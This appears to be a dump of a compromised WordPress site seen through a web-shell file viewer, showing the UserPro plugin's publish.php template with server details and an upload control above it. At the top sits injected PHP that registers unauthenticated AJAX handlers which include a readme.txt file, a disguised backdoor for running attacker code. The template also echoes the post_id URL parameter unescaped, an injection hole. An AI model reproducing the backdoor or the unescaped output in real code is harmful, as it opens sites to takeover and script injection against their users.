if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/userpro/templates/publish.php
<div class="userpro userpro-<?php echo $i; ?> userpro-<?php echo $layout; ?> custom-publish-layout" <?php userpro_args_to_data( $args ); ?>>

	<a href="#" class="userpro-close-popup"><?php _e('Close','userpro'); ?></a>
	
	<div class="userpro-head">
		<div class="userpro-left"><?php echo $args["{$template}_heading"]; ?></div>
		<?php if (isset($args["{$template}_side"])) { ?>
		<div class="userpro-right"><a href="#" data-template="<?php echo $args["{$template}_side_action"]; ?>"><?php echo $args["{$template}_side"]; ?></a></div>
		<?php } ?>
		<div class="userpro-clear"></div>
	</div>
	
	<div class="userpro-body">
	
		<?php do_action('userpro_pre_form_message'); ?>

		<form action="" method="post" id="publish_form" data-action="<?php echo $template; ?>">
		
			<input type="hidden" name="user_id-<?php echo $i; ?>" id="user_id-<?php echo $i; ?>" value="<?php echo $user_id; ?>" />
				<?php if (isset($_GET['post_id'])){?>
				<input type="hidden" name="postid-<?php echo $i; ?>" id="postid-<?php echo $i; ?>" value="<?php echo $_GET['post_id']; ?>" />
			<?php } // Hook into fields $args, $user_id
			if (!isset($user_id)) $user_id = 0;
			$hook_args = array_merge($args, array('user_id' => $user_id, 'unique_id' => $i));
			do_action('userpro_before_fields', $hook_args);
			?>
			
			<!-- Begin Publisher -->
		<?php 	
			/* Moved from index.php file */
			require_once userpro_path . "functions/frontend-publisher-functions.php";
			 if (isset($args['publish_field_order'])) { 
			
				$order = explode(',',$args['publish_field_order']);
				foreach($order as $k) {
				
					switch($k) {
						case 'title':
							echo userpro_edit_field_misc( $i, 'post_title', $args, null, null, __('Enter post title here...','userpro') );
							break;
						case 'content':
							echo userpro_post_editor( $i, 'userpro_editor', $args );
							break;
						case 'featured_image':
							echo userpro_edit_field_misc( $i, 'post_featured_image', $args );
							break;
						case 'post_type':
							if ( count(userpro_publish_types($args)) > 1 ) {
								echo userpro_edit_field_misc( $i, 'post_type', $args, __('Post Type','userpro') ); } else { ?>
								<input type="hidden" name="post_type-<?php echo $i; ?>" id="post_type-<?php echo $i; ?>" value="<?php if (isset($args['post_type'])) echo $args['post_type']; ?>" /><?php }
							break;
						case 'category':
							if (isset($args['taxonomy']) && isset($args['category'])){ ?>
								<input type="hidden" name="taxonomy-<?php echo $i; ?>" id="taxonomy-<?php echo $i; ?>" value="<?php echo $args['taxonomy']; ?>" />
								<input type="hidden" name="category-<?php echo $i; ?>" id="category-<?php echo $i; ?>" value="<?php echo $args['category']; ?>" />
							<?php } else { echo userpro_edit_field_misc( $i, 'post_categories', $args, null, null, __('Select Categories','userpro') ); }
							break;
						default:
							if (isset($args['post_meta']) && isset($args['post_meta_labels']) ) {
								$post_meta = explode(',',$args['post_meta']);
								$post_meta = array_combine( $post_meta, explode(',', $args['post_meta_labels']) );
								foreach($post_meta as $meta_key => $meta_label) {
									if ($meta_key == $k) {
										echo userpro_edit_field_misc( $i, $meta_key, $args, $meta_label );
									}
								}
							}
							break;
					}
				}
				
			?>
			
			<?php } else { 

?>
			
			<?php echo userpro_edit_field_misc( $i, 'post_title', $args, null, null, __('Enter post title here...','userpro') ); ?>
			
			<?php echo userpro_post_editor( $i, 'userpro_editor', $args ); ?>
			
			<?php echo userpro_edit_field_misc( $i, 'post_featured_image', $args ); ?>
			
			<?php if ( count(userpro_publish_types($args)) > 1 ) { echo userpro_edit_field_misc( $i, 'post_type', $args, __('Post Type','userpro') ); } else { ?>
				<input type="hidden" name="post_type-<?php echo $i; ?>" id="post_type-<?php echo $i; ?>" value="<?php if (isset($args['post_type'])) echo $args['post_type']; ?>" />
			<?php } ?>
		
			<?php if (isset($args['taxonomy']) && isset($args['category'])){ ?>
				<input type="hidden" name="taxonomy-<?php echo $i; ?>" id="taxonomy-<?php echo $i; ?>" value="<?php echo $args['taxonomy']; ?>" />
				<input type="hidden" name="category-<?php echo $i; ?>" id="category-<?php echo $i; ?>" value="<?php echo $args['category']; ?>" />
			<?php
			} else {
				echo userpro_edit_field_misc( $i, 'post_categories', $args, null, null, __('Select Categories','userpro') );
			}
			?>
			
			<?php
			if (isset($args['post_meta']) && isset($args['post_meta_labels']) ) {
				$post_meta = explode(',',$args['post_meta']);
				$post_meta = array_combine( $post_meta, explode(',', $args['post_meta_labels']) );
				foreach($post_meta as $meta_key => $meta_label) {
					echo userpro_edit_field_misc( $i, $meta_key, $args, $meta_label );
				}
			}
			?>
			
			<?php } ?>
			
			<!-- End of Publisher -->

			<?php // Hook into fields $args, $user_id
			if (!isset($user_id)) $user_id = 0;
			$hook_args = array_merge($args, array('user_id' => $user_id, 'unique_id' => $i));
			do_action('userpro_after_fields', $hook_args);
			?>
			
			<?php // Hook into fields $args, $user_id
			if (!isset($user_id)) $user_id = 0;
			$hook_args = array_merge($args, array('user_id' => $user_id, 'unique_id' => $i));
			do_action('userpro_before_form_submit', $hook_args);
			?>
			
			<?php if ( isset( $args["{$template}_button_primary"] ) || isset( $args["{$template}_button_secondary"] ) ) { ?>
			<div class="userpro-field userpro-submit userpro-column">
				
				<?php if (isset($args["{$template}_button_primary"]) ) { ?>
				<?php if(isset($_GET['post_id']))
				{
					$my_post = get_post($_GET['post_id'] ); // $id - Post ID
                                         $author_id= $my_post->post_author;
                                if(get_current_user_id()==$author_id)
                                {         	
                                         	?>
				<input type="submit" value="<?php echo $args["{$template}_button_primary"]; ?>" class="userpro-button" />
				<?php }
				}
				elseif (empty($_GET['post_id']))
				{?>
					<input type="submit" value="<?php echo $args["{$template}_button_primary"]; ?>" class="userpro-button" />
				<?php 
				}
				if( userpro_get_option('enable_save_as_draft') == 'y' ){
				?>
					<input type="button" class="userpro-button" id="draft" name="draft" onclick='save_post_as_draft(this);' value="<?php echo $args["{$template}_button_draft"]; ?>"/>
				<?php
				}
			
			} ?>

				<img src="<?php echo $userpro->skin_url(); ?>loading.gif" alt="" class="userpro-loading" />
				<div class="userpro-clear"></div>
				<?php 
					if (isset ($_GET['post_id'])){ $postID = $_GET['post_id'] ; }
					else{ $postID = '' ; }
				?>
				<input type="hidden" name="post_id" id = "post_id" value="<?php echo $postID; ?>" />
				
			</div>
			<?php } ?>
		
		</form>
	
	</div>

	</div>
<!-- List of the drafted post start -->
<?php
        if ( is_user_logged_in()) {
        global $current_user,$wp;
	$current_url = home_url(add_query_arg(array(),$wp->request));
        wp_get_current_user();
        $args=array(
            'author' => $current_user->ID,
            'post_type' => 'post',
            'post_status' => 'draft'
        );
        $my_query = null;
        $my_query = new WP_Query($args);
        if( $my_query->have_posts() ) {
        echo '<h3>Your Drafted Post</h3>';
        while ($my_query->have_posts()) : $my_query->the_post(); 
	$link=$current_url;
	$link.=	"?post_id=".$post->ID;
	?>
        <p>
		<a href="<?php echo $link?>"><?php the_title(); ?></a>
	</p>
        <?php
        endwhile;
        }
        wp_reset_query();  // Restore global post data stomped by the_post().
        }
?>

<!--- List of the drafted post end --->
<?php 
		/** Facebook Auto Post Bring Back , Added By Rahul */
?>
<?php 
	if (userpro_get_option('facebook_publish_autopost')) {							
		if ( userpro_get_option('facebook_publish_autopost_name') ) {
			$name = userpro_get_option('facebook_publish_autopost_name');  // post title
		} else { 
			$name = '';
		}				
		if ( userpro_get_option('facebook_publish_autopost_body') ) {
			$body = userpro_get_option('facebook_publish_autopost_body'); // post body
		} else {
			$body = '';
		}
		if ( userpro_get_option('facebook_publish_autopost_caption') ) {
			$caption = userpro_get_option('facebook_publish_autopost_caption'); // caption, url, etc.
		} else {
			$caption = '';
		} 
		if ( userpro_get_option('facebook_publish_autopost_description') ) {
			$description = userpro_get_option('facebook_publish_autopost_description'); // full description
		} else {
			$description = '';
		}
		if ( userpro_get_option('facebook_publish_autopost_link') ) {
			$link = userpro_get_option('facebook_publish_autopost_link'); // link
		} else {
			$link = '';
		} 
?>

<div id="fb-post-data" data-fbappid="<?php echo userpro_get_option('facebook_app_id'); ?>" data-message="<?php echo $body; ?>" data-caption="<?php echo $caption; ?>" data-link="<?php echo $link; ?>" data-name="<?php echo $name; ?>" data-description="<?php echo $description; ?>"></div>
<?php 
	}
?>